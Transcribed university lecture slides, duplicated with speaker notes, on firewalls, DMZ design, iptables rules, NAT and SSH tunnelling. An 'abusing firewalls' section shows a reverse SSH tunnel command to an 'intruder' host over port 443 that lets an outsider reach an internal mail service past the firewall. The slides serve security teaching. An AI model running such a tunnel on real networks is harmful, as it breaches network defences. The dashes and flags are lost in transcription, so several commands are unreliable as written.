Focus on Security. Keeping the bad guys out

Transcription

1 Focus on Security Keeping the bad guys out

2 3 ICT Security Topics: Day 1: General principles. Day 2: System hardening and integrity. Day 3: Keeping the bad guys out. Day 4: Seeing the invisible; what's passing through the wires? Day 5: Summary and conclusions.

3 4 ICT Security Today's topics: Firewalls: principles and implementation Network Address Translation (NAT) Abusing firewalls

4 5 Apply A Firewall Firewalls: Not a cure against all your problems. Is primarily useful to prevent attacks from the outside world aimed at our computers. But... Webbrowsing, ??

5 6 Apply A Firewall Firewalls: Every opening is a hole in the wall Viruses/Worms may leave through the hole; Malignant software may use encryption, and may thus be undistinguishable from `legal' traffic using encryption. Firewalls need maintenance. Who's doing that? Who has the knowledge to do so? Firewalls are bypassed when the user downloads the malware

6 7 Firewalls: Setup Terminology: Bastion Hosts DMZ Firewall Internal Network Multi homed host (Stateful) packet filtering

7 8 Firewalls: Setup Basic (Common) Setup:

8 9 Firewalls: Setup DMZ (Preferred) Setup: Firewall Setup Router Fire wall DMZ External Servers (DNS, Mail Web) Switch Internal Net Workstations Internal Servers (DNS, File, Mail)

9 10 Firewalls: Setup DMZ Communication rules: Internet to/from DMZ Internet to/from Internal net DMZ to/from Internal net Internet Internal Net DMZ

10 11 Firewalls: Setup DMZ Communication rules: Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection No forwarding Internet Internal Net DMZ

11 12 Firewalls: Setup DMZ Communication rules: Internet to/from Internal net No new inbound connections No new outbound connections if proxying is at all possible; otherwise be extremely cautious No forwarding Simple plain spoofing protection Internet Internal Net DMZ

12 13 Firewalls: Setup DMZ Communication rules: DMZ to/from Internal net No new connections from the DMZ to workstations New connections only to/from matching services Simple spoofing protection rules No forwarding Internet Internal Net DMZ

13 14 Firewalls: Implementation Iptables is used to implement the firewall Widely available Free software No special hardware required Can be used on a per host or organization level

14 15 Firewalls: Implementation Iptables installation and activation Installation: apt get install iptables Documentation: Activation:./iptables /path/to/rules file The rules file is a simple text file This scheme is usually fine tuned

15 16 Firewalls: concepts What is input, output and forwarding? Incoming Traffic Routing Decision FORWARDING Outgoing Traffic INPUT Local Processes OUTPUT

16 17 Firewalls: concepts What is input, output and forwarding? Routing Decisions: INPUT or FORWARDING? Incoming Traffic Routing Decision FORWARDING Outgoing Traffic what's the intended destination? INPUT Local Processes OUTPUT Incoming traffic is immediately separated between intended for this computer or not.

17 18 Firewalls: concepts What is input, output and forwarding? INPUT: Incoming Traffic Routing Decision FORWARDING Outgoing Traffic input decisions INPUT Local Processes OUTPUT Traffic entering the computer is intended for the computer itself. Verified at INPUT

18 19 Firewalls: concepts What is input, output and forwarding? OUTPUT Incoming Traffic Routing Decision FORWARDING Outgoing Traffic INPUT Local Processes OUTPUT output decisions Traffic handled by local processes, is leaving the computer if verified by OUTPUT

19 20 Firewalls: concepts What is input, output and forwarding? FORWARDING Forwarding decisions Incoming Traffic Routing Decision FORWARDING Outgoing Traffic INPUT Local Processes OUTPUT Traffic not intended for local processes is passing through, if verified by FORWARDING

20 21 Firewalls: Rules A simple (and not so desirable) initial file: P OUTPUT ACCEPT F OUTPUT Accept all output connections P INPUT ACCEPT F INPUT P FORWARD ACCEPT F FORWARD Accept all input connections Accept all forwarding connections No filtering of any kind. could be useful, though...

21 22 Firewalls: Rules Handling IPv6: /sbin/ip6tables flush /sbin/ip6tables delete chain /sbin/ip6tables P OUTPUT DROP /sbin/ip6tables P INPUT DROP /sbin/ip6tables P FORWARD DROP Drop output connections Drop input connections Drop forwarding connections

22 23 Firewalls: Setup DMZ Setup: Firewall Setup Router Fire wall DMZ Servers (smtp, http, https) Switch Internal Net Workstations

23 24 Firewalls: implementing the DMZ Recap: DMZ Communication rules Internet to/from DMZ Incoming only to known services (e.g., smtp, http, https) Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection No forwarding Internet Internal Net DMZ

24 25 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services (e.g., smtp, http, https) P INPUT DENY F INPUT A INPUT p tcp dport smtp j ACCEPT A INPUT p tcp dport http j ACCEPT A INPUT p tcp dport https j ACCEPT A INPUT m state state RELATED,ESTABLISHED j ACCEPT

25 26 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections A OUTPUT m state state RELATED,ESTABLISHED j ACCEPT

26 27 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Start the output rules with: P OUTPUT DENY F OUTPUT

27 28 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection A OUTPUT s ${DNS name} \ m state state RELATED,ESTABLISHED j ACCEPT

28 29 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection No forwarding P FORWARD DENY F FORWARD

29 30 Firewalls: implementing the DMZ Internet to/from DMZ: the complete setup P INPUT DENY F INPUT A INPUT p tcp dport smtp j ACCEPT A INPUT p tcp dport http j ACCEPT A INPUT p tcp dport https j ACCEPT A INPUT m state state RELATED,ESTABLISHED j ACCEPT P OUTPUT DENY F OUTPUT A OUTPUT s ${DNS name} \ m state state RELATED,ESTABLISHED j ACCEPT P FORWARD DENY F FORWARD

30 31 Firewalls: implementing the DMZ If there's a network behind your box, then your box is a router. Add to /etc/sysctl.conf: net.ipv4.conf.default.rp_filter=1 net.ipv4.conf.all.rp_filter=1 net.ipv4.ip_forward=1 # spoofing protection # forward IP4 packets # what it says: net.ipv4.icmp_echo_ignore_broadcasts = 1

31 32 Network Address Translation Concepts: Source NAT the source address (i.e., where is the packed coming from) is modified. Just before the packet leaves the box: Postrouting. Example: masquerading Incoming Traffic Routing Decision FORWARDING NAT: Postrouting INPUT Local Processes OUTPUT Outgoing Traffic

32 33 Network Address Translation Concepts: Destination NAT Incoming Traffic the destination address (i.e., where is the packed going to) is modified. Just before the routing decision is made: Prerouting. Example: port forwarding, proxying NAT: prerouting Routing Decision FORWARDING NAT: Postrouting INPUT Local Processes OUTPUT Outgoing Traffic

33 34 Network Address Translation Source NAT: changing the address the packet is coming from, POST routing With POST routing the package leaves the router Application: computers behind a router using a private range all information coming from these computers should appear to be coming from the router.

34 35 Network Address Translation Source NAT (POST routing) application: computers behind a router in a private range information from these computers appear to come from the router x.y interface router Internet interface x.y range Source NAT: x.y. appears to be the router

35 36 Network Address Translation Source NAT (POST routing) application: t nat A POSTROUTING s x.y/24 o eth0 j SNAT \ to source $routerip x.y interface (eth1) router Internet interface (eth0) x.y range Source NAT: x.y. appears to be the router

36 37 Network Address Translation Destination NAT: changing the address the packet is going to, PRE routing. With PRE routing the package enters the router. Application: computers behind a router using a private range all information coming from these computers should appear to be coming from the router.

37 38 Network Address Translation Destination NAT (PRE routing) application: x.y range computers behind a router information sent to the router is relayed to one of the computers in the private range trusted MTA router Internet interface x.y interface x.25 Destination NAT: x.25 receives the mail

38 39 Network Address Translation Destination NAT (PRE routing) application: t nat A PREROUTING p tcp s $MTA IP d $routerip \ dport 25 j DNAT to destination x x.y range trusted MTA router Internet interface x.y interface x.25 Destination NAT: x.25 receives the mail

39 40 Source NAT Logging NATLOG logs the network translations Actions performed by source nat translations: IPsrc:sport range IPsrc:sport is translated by the firewall to IPfw:fwport; IPfw:fwport is used when communicating with IPdst:dport x.y interface (eth1) router IPfw::fwport Internet iface (eth0) Source NAT: x.y. appears to be the origin

40 41 Source NAT Logging NATLOG logs the network translations Standard log facilities offer complex data NATLOG beautifies the logs from pcap library facilities looking at the interfaces information made available by conntrackd IPsrc:sport range x.y interface (eth1) router IPfw::fwport Internet iface (eth0) Source NAT: x.y. appears to be the origin

41 42 Source NAT Logging NATLOG logs the network translations Two activation commands: natlog indevice outdevice (e.g. natlog eth1 eth0) natlog conntrack (requires conntrack installed) Syslog logs may be sent to a dedicated natlog.log :syslogtag, isequal, "NATLOG:" /var/log/natlog.log :syslogtag, isequal, "NATLOG:" ~ IPsrc:sport range

42 43 Source NAT Logging NATLOG logs the network translations Examples of some log entries: Jan 6 13:06:28 vpn NATLOG: from Jan 6 12:04:25:48963 until Jan 6 12:06:28: (UTC): :55359 (via: :55359) to :113 Jan 6 13:12:08 vpn NATLOG: from Jan 6 12:08:12: until Jan 6 12:12:08: (UTC): :3166 (via: :3166) to :80 IPsrc:sport range

43 44 Firewalls and tunnels The concept Enter at one end Reappear at the other end

44 45 Firewalls and tunnels Tunnels: the concept, as used in Information Technology: Exchange insecure (unencrypted) information between computers using a secure (encrypted) protocol Often: ssh is used In real life firewalls allow at least some outgoing connections (http, https, smtp)

45 46 Firewalls and tunnels Tunnels: the concept, as used in Information Technology: Often: ssh is used. Connect to a remote computer's service, using a secure tunnel Allow remote computer's local connections to access a remote computer's service What this boils down to...

46 47 Firewalls and tunnels The situation: Workstation and Server (offering sensitive service at port 143, behind a firewall) Firewall accepts only traffic on ports 80 and 443 Trusted local area network Intruder (located outside the firewall) W (143) S Firewall: transfers ports 80, 443 I

47 48 Firewalls and tunnels The Intruder: (143) At the intruder an ssh daemon runs watching port 443 (e.g., sshd p 443) W S Firewall: transfers ports 80, 443 provides ssh-daemon watching port 443 I

48 49 Firewalls and tunnels Malware: At the workstation the shown ssh command is executed, using: W ssh -p 443 -R 1443:server:143 intruder (143) S Firewall: a virus transfers ports 80, 443 social engineering a disgruntled employee?... (443) I

49 50 Firewalls and tunnels Setting up the tunnel: Ssh connects through the firewall to port 443 at intruder W ssh -p 443 -R 1443:server:143 intruder (143) S Firewall: transfers ports 80, 443 (443) I

50 51 Firewalls and tunnels (Ab)using the tunnel: A client at intruder connects using intruder's local port 1443 W ssh -p 443 -R 1443:server:143 intruder (143) S Firewall: transfers ports 80, 443 client connecting to local port 1443 (443) I

51 52 Firewalls and tunnels Tunnels: A secure tunnel is now established through the workstation, W allowing the accessor to use the server's service 143 directly. The firewall offers no protection. ssh -p 443 -R 1443:server:143 ssh -p 443 -R 1443:server:143 intruder intruder (143) S Firewall: transfers ports 80, 443 client connecting to local port 1443 I (443)

52 53 Firewalls and tunnels Why tunneling Tunnels to secure inherently insecure protocols (pop, daytime,...) As a side effect: the hacker can use the tools too... Less serious applications: X11 tunneling (see the SSH documentation) Allowing insecure services, running locally, to be accessed through an encrypted tunnel.

53 54 Firewalls and tunnels Tunnels: Allowing insecure services, running locally, to be accessed through an encrypted tunnel. Example: ssh L 1313:localhost:13 remote host forward connections from port 1313 at the local host

54 55 Firewalls and tunnels Tunnels: Allowing insecure services, running locally, to be accessed through an encrypted tunnel. Example: ssh L 1313:remote host:13 remote host forward connections from port 1313 at the local host to port 13 at remote host.

55 56 Firewalls and tunnels Tunnels: Allowing insecure services, running locally, to be accessed through an encrypted tunnel. 2 nd Example: ssh L 1313:alternate host:13 remote host connect to port 13 at alternate host, succeeding if remote host allows us to connect to alternate host's port 13. The connection between localhost and remote host is secure. Not between remote host and alternate host. Note: Use g to access port 1313 from any host.

56 57 Firewalls and tunnels Ssh tunnels: a summary: Securing insecure protocols (1): ssh L 1313:some host:13 remote host Connections to localhost:1313 are forwarded using ssh to remote host, and from there to somehost:13. some host may be remote host The g option allows any host to connect to port 1313 of the computer issuing the ssh command (dangerous!)

57 58 Firewalls and tunnels Ssh tunnels: a summary: Securing insecure protocols (2): ssh remote host R 1234:some host:80 Connections from remote host:1234 to the computer issuing the ssh command are encrypted and from there forwarded to some host:80

58 59 Focus on Security Today's topics: Firewalls: principles and implementation Network Address Translation Abusing firewalls Although they can be abused, firewalls usually offer a good line of defense, as they block the majority of intrusion attempts They offer no protection against abuse caused by infections (possibly caused by users)

59 60 Focus on Security Day 4: Seeing the invisible The bottom line: tcpdump The applications: Wireshark OpenVAS

60 61 Focus on Security Keeping the bad guys out (?) dr. Frank B. Brokken Center of Information Technology University of Groningen 2013

61 Focus on Security Keeping the bad guys out

62 3 Topics: ICT Security Day 1: General principles. Day 2: System hardening and integrity. Day 3: Keeping the bad guys out. Day 4: Seeing the invisible; what's passing through the wires? Day 5: Summary and conclusions. Security is complex and extensive Only the highlights will be covered during this course Aims: increase awareness, show examples, present framework

63 4 ICT Security Today's topics: Firewalls: principles and implementation Network Address Translation (NAT) Abusing firewalls Security is complex and extensive Only the highlights will be covered during this course Aims: increase awareness, show examples, present framework

64 5 Apply A Firewall Firewalls: Not a cure against all your problems. Is primarily useful to prevent attacks from the outside world aimed at our computers. But... Webbrowsing, ??

65 6 Apply A Firewall Firewalls: Every opening is a hole in the wall Viruses/Worms may leave through the hole; Malignant software may use encryption, and may thus be undistinguishable from `legal' traffic using encryption. Firewalls need maintenance. Who's doing that? Who has the knowledge to do so? Firewalls are bypassed when the user downloads the malware

66 7 Firewalls: Setup Terminology: Bastion Hosts DMZ Firewall Internal Network Multi homed host (Stateful) packet filtering

67 8 Firewalls: Setup Basic (Common) Setup:

68 9 Firewalls: Setup DMZ (Preferred) Setup: Firewall Setup Router Fire wall DMZ External Servers (DNS, Mail Web) Switch Internal Net Workstations Internal Servers (DNS, File, Mail)

69 10 Firewalls: Setup DMZ Communication rules: Internet to/from DMZ Internet to/from Internal net DMZ to/from Internal net Internet Internal Net DMZ

70 11 Firewalls: Setup DMZ Communication rules: Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection No forwarding Internet Internal Net DMZ

71 12 Firewalls: Setup DMZ Communication rules: Internet to/from Internal net No new inbound connections No new outbound connections if proxying is at all possible; otherwise be extremely cautious No forwarding Simple plain spoofing protection Internet Internal Net DMZ

72 13 Firewalls: Setup DMZ Communication rules: DMZ to/from Internal net No new connections from the DMZ to workstations New connections only to/from matching services Simple spoofing protection rules No forwarding Internet Internal Net DMZ

73 14 Firewalls: Implementation Iptables is used to implement the firewall Widely available Free software No special hardware required Can be used on a per host or organization level

74 15 Firewalls: Implementation Iptables installation and activation Installation: apt get install iptables Documentation: Activation:./iptables /path/to/rules file The rules file is a simple text file This scheme is usually fine tuned iptables save and iptables restore are usually called from /etc/init.d/iptables at startup to reinstall the firewall as soon as the computer boots. iptables save saves the contents of the iptables to cout. Incantation: iptables save > /var/lib/iptables/active (restore in, e.g., /etc/network/if pre up.d)

75 16 Firewalls: concepts What is input, output and forwarding? Incoming Traffic Routing Decision FORWARDING Outgoing Traffic INPUT Local Processes OUTPUT

76 17 Firewalls: concepts What is input, output and forwarding? Routing Decisions: INPUT or FORWARDING? Incoming Traffic Routing Decision FORWARDING Outgoing Traffic what's the intended destination? INPUT Local Processes OUTPUT Incoming traffic is immediately separated between intended for this computer or not.

77 18 Firewalls: concepts What is input, output and forwarding? INPUT: Incoming Traffic Routing Decision FORWARDING Outgoing Traffic input decisions INPUT Local Processes OUTPUT Traffic entering the computer is intended for the computer itself. Verified at INPUT

78 19 Firewalls: concepts What is input, output and forwarding? OUTPUT Incoming Traffic Routing Decision FORWARDING Outgoing Traffic INPUT Local Processes OUTPUT output decisions Traffic handled by local processes, is leaving the computer if verified by OUTPUT

79 20 Firewalls: concepts What is input, output and forwarding? FORWARDING Forwarding decisions Incoming Traffic Routing Decision FORWARDING Outgoing Traffic INPUT Local Processes OUTPUT Traffic not intended for local processes is passing through, if verified by FORWARDING

80 21 Firewalls: Rules A simple (and not so desirable) initial file: P OUTPUT ACCEPT F OUTPUT Accept all output connections P INPUT ACCEPT F INPUT P FORWARD ACCEPT F FORWARD Accept all input connections Accept all forwarding connections No filtering of any kind. could be useful, though... as fall back to make visible what you're doing if you're not using a firewall

81 22 Firewalls: Rules Handling IPv6: /sbin/ip6tables flush /sbin/ip6tables delete chain /sbin/ip6tables P OUTPUT DROP /sbin/ip6tables P INPUT DROP /sbin/ip6tables P FORWARD DROP Drop output connections Drop input connections Drop forwarding connections

82 23 Firewalls: Setup DMZ Setup: Firewall Setup Router Fire wall DMZ Servers (smtp, http, https) Switch Internal Net Workstations

83 24 Firewalls: implementing the DMZ Recap: DMZ Communication rules Internet to/from DMZ Incoming only to known services (e.g., smtp, http, https) Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection No forwarding Internet Internal Net DMZ

84 25 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services (e.g., smtp, http, https) P INPUT DENY F INPUT A INPUT p tcp dport smtp j ACCEPT A INPUT p tcp dport http j ACCEPT A INPUT p tcp dport https j ACCEPT A INPUT m state state RELATED,ESTABLISHED j ACCEPT

85 26 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections A OUTPUT m state state RELATED,ESTABLISHED j ACCEPT

86 27 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Start the output rules with: P OUTPUT DENY F OUTPUT

87 28 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection A OUTPUT s ${DNS name} \ m state state RELATED,ESTABLISHED j ACCEPT

88 29 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection No forwarding P FORWARD DENY F FORWARD

89 30 Firewalls: implementing the DMZ Internet to/from DMZ: the complete setup P INPUT DENY F INPUT A INPUT p tcp dport smtp j ACCEPT A INPUT p tcp dport http j ACCEPT A INPUT p tcp dport https j ACCEPT A INPUT m state state RELATED,ESTABLISHED j ACCEPT P OUTPUT DENY F OUTPUT A OUTPUT s ${DNS name} \ m state state RELATED,ESTABLISHED j ACCEPT P FORWARD DENY F FORWARD

90 31 Firewalls: implementing the DMZ If there's a network behind your box, then your box is a router. Add to /etc/sysctl.conf: net.ipv4.conf.default.rp_filter=1 net.ipv4.conf.all.rp_filter=1 net.ipv4.ip_forward=1 # spoofing protection # forward IP4 packets # what it says: net.ipv4.icmp_echo_ignore_broadcasts = 1

91 32 Network Address Translation Concepts: Source NAT Incoming Traffic the source address (i.e., where is the packed coming from) is modified. Just before the packet leaves the box: Postrouting. Example: masquerading Routing Decision FORWARDING NAT: Postrouting INPUT Local Processes OUTPUT Outgoing Traffic

92 33 Network Address Translation Concepts: Destination NAT Incoming Traffic the destination address (i.e., where is the packed going to) is modified. Just before the routing decision is made: Prerouting. Example: port forwarding, proxying NAT: prerouting Routing Decision FORWARDING NAT: Postrouting INPUT Local Processes OUTPUT Outgoing Traffic

93 34 Network Address Translation Source NAT: changing the address the packet is coming from, POST routing With POST routing the package leaves the router Application: computers behind a router using a private range all information coming from these computers should appear to be coming from the router.

94 35 Network Address Translation Source NAT (POST routing) application: computers behind a router in a private range information from these computers appear to come from the router x.y interface router Internet interface x.y range Source NAT: x.y. appears to be the router

95 36 Network Address Translation Source NAT (POST routing) application: t nat A POSTROUTING s x.y/24 o eth0 j SNAT \ to source $routerip x.y interface (eth1) router Internet interface (eth0) x.y range Source NAT: x.y. appears to be the router

96 37 Network Address Translation Destination NAT: changing the address the packet is going to, PRE routing. With PRE routing the package enters the router. Application: computers behind a router using a private range all information coming from these computers should appear to be coming from the router.

97 38 Network Address Translation Destination NAT (PRE routing) application: computers behind a router x.y range information sent to the router is relayed to one of the computers in the private range trusted MTA router Internet interface x.y interface x.25 Destination NAT: x.25 receives the mail

98 39 Network Address Translation Destination NAT (PRE routing) application: t nat A PREROUTING p tcp s $MTA IP d $routerip \ dport 25 j DNAT to destination x x.y range trusted MTA router Internet interface x.y interface x.25 Destination NAT: x.25 receives the mail

99 40 Source NAT Logging NATLOG logs the network translations Actions performed by source nat translations: IPsrc:sport range IPsrc:sport is translated by the firewall to IPfw:fwport; IPfw:fwport is used when communicating with IPdst:dport x.y interface (eth1) router IPfw::fwport Internet iface (eth0) Source NAT: x.y. appears to be the origin

100 41 Source NAT Logging NATLOG logs the network translations Standard log facilities offer complex data NATLOG beautifies the logs from pcap library facilities looking at the interfaces information made available by conntrackd IPsrc:sport range x.y interface (eth1) router IPfw::fwport Internet iface (eth0) Source NAT: x.y. appears to be the origin

101 42 Source NAT Logging NATLOG logs the network translations Two activation commands: natlog indevice outdevice (e.g. natlog eth1 eth0) natlog conntrack (requires conntrack installed) Syslog logs may be sent to a dedicated natlog.log :syslogtag, isequal, "NATLOG:" /var/log/natlog.log :syslogtag, isequal, "NATLOG:" ~ IPsrc:sport range

102 43 Source NAT Logging NATLOG logs the network translations Examples of some log entries: Jan 6 13:06:28 vpn NATLOG: from Jan 6 12:04:25:48963 until Jan 6 12:06:28: (UTC): :55359 (via: :55359) to :113 Jan 6 13:12:08 vpn NATLOG: from Jan 6 12:08:12: until Jan 6 12:12:08: (UTC): :3166 (via: :3166) to :80 IPsrc:sport range

103 44 Firewalls and tunnels The concept Enter at one end Reappear at the other end

104 45 Firewalls and tunnels Tunnels: the concept, as used in Information Technology: Exchange insecure (unencrypted) information between computers using a secure (encrypted) protocol Often: ssh is used In real life firewalls allow at least some outgoing connections (http, https, smtp)

105 46 Firewalls and tunnels Tunnels: the concept, as used in Information Technology: Often: ssh is used. Connect to a remote computer's service, using a secure tunnel Allow remote computer's local connections to access a remote computer's service What this boils down to...

106 47 Firewalls and tunnels The situation: Workstation and Server (offering sensitive service at port 143, behind a firewall) Firewall accepts only traffic on ports 80 and 443 Trusted local area network Intruder (located outside the firewall) W (143) S Firewall: transfers ports 80, 443 I

107 48 Firewalls and tunnels The Intruder: (143) At the intruder an ssh daemon runs watching port 443 (e.g., sshd p 443) W S Firewall: transfers ports 80, 443 provides ssh-daemon watching port 443 I

108 49 Firewalls and tunnels Malware: At the workstation the shown ssh command is executed, using: a virus social engineering a disgruntled employee?... W ssh -p 443 -R 1443:server:143 intruder (143) S Firewall: transfers ports 80, 443 I (443)

109 50 Firewalls and tunnels Setting up the tunnel: Ssh connects through the firewall to port 443 at intruder W ssh -p 443 -R 1443:server:143 intruder (143) S Firewall: transfers ports 80, 443 (443) I

110 51 Firewalls and tunnels (Ab)using the tunnel: A client at intruder connects using intruder's local port 1443 W ssh -p 443 -R 1443:server:143 intruder (143) S Firewall: transfers ports 80, 443 client connecting to local port 1443 (443) I

111 52 Firewalls and tunnels Tunnels: A secure tunnel is now established through the workstation, W allowing the accessor to use the server's service 143 directly. The firewall offers no protection. client connecting to local port 1443 ssh -p 443 -R 1443:server:143 ssh -p 443 -R 1443:server:143 intruder intruder (143) S Firewall: transfers ports 80, 443 I (443)

112 53 Firewalls and tunnels Why tunneling Tunnels to secure inherently insecure protocols (pop, daytime,...) As a side effect: the hacker can use the tools too... Less serious applications: X11 tunneling (see the SSH documentation) Allowing insecure services, running locally, to be accessed through an encrypted tunnel.

113 54 Firewalls and tunnels Tunnels: Allowing insecure services, running locally, to be accessed through an encrypted tunnel. Example: ssh L 1313:localhost:13 remote host forward connections from port 1313 at the local host

114 55 Firewalls and tunnels Tunnels: Allowing insecure services, running locally, to be accessed through an encrypted tunnel. Example: ssh L 1313:remote host:13 remote host forward connections from port 1313 at the local host to port 13 at remote host.

115 56 Firewalls and tunnels Tunnels: Allowing insecure services, running locally, to be accessed through an encrypted tunnel. 2 nd Example: ssh L 1313:alternate host:13 remote host connect to port 13 at alternate host, succeeding if remote host allows us to connect to alternate host's port 13. The connection between localhost and remote host is secure. Not between remote host and alternate host. Note: Use g to access port 1313 from any host.

116 57 Firewalls and tunnels Ssh tunnels: a summary: Securing insecure protocols (1): ssh L 1313:some host:13 remote host Connections to localhost:1313 are forwarded using ssh to remote host, and from there to somehost:13. some host may be remote host The g option allows any host to connect to port 1313 of the computer issuing the ssh command (dangerous!)

117 58 Firewalls and tunnels Ssh tunnels: a summary: Securing insecure protocols (2): ssh remote host R 1234:some host:80 Connections from remote host:1234 to the computer issuing the ssh command are encrypted and from there forwarded to some host:80

118 59 Focus on Security Today's topics: Firewalls: principles and implementation Network Address Translation Abusing firewalls Although they can be abused, firewalls usually offer a good line of defense, as they block the majority of intrusion attempts They offer no protection against abuse caused by infections (possibly caused by users)

119 60 Focus on Security Day 4: Seeing the invisible The bottom line: tcpdump The applications: Wireshark OpenVAS

120 61 Focus on Security Keeping the bad guys out (?) dr. Frank B. Brokken Center of Information Technology University of Groningen 2013